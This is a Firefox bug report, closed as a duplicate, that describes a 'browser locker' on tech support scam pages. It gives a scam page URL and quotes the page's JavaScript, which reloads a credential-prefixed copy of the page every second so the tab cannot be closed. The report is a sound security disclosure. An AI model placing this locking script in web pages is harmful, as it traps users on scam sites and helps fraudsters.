Closed Bug 1593795 Opened 5 years ago Closed 5 years ago

browser locker

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
70 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1571003

People

(Reporter: malwareinfosec, Unassigned)

References

(Depends on 1 open bug, Blocks 1 open bug)

Details

Attachments

(1 file)

FF_locker.gif
(deleted), image/gif
Details
Attached image FF_locker.gif (deleted) —

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36

Steps to reproduce:

Browse to a tech support scam page: http://d2o1sv4d11x6bc.cloudfront.net/firefox/index.html

Actual results:

Browser is locked, you cannot close the browser tab or window. This is used by tech support scammers.
Here's how they do it:
<script type="text/javascript">
window.onload = function () {
setTimeout(()=>{
location.href="http://admin@"+location.host+location.pathname+location.search;
setInterval(()=>{location.href="http://admin@"+location.host+location.pathname+location.search;},1000);
},300);
}
</script>

Expected results:

User should be able to close the browser.

Blocks: eviltraps
Depends on: 1306334
Type: enhancement → defect

That's Bug 1571003, which I'm currently working on.

Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: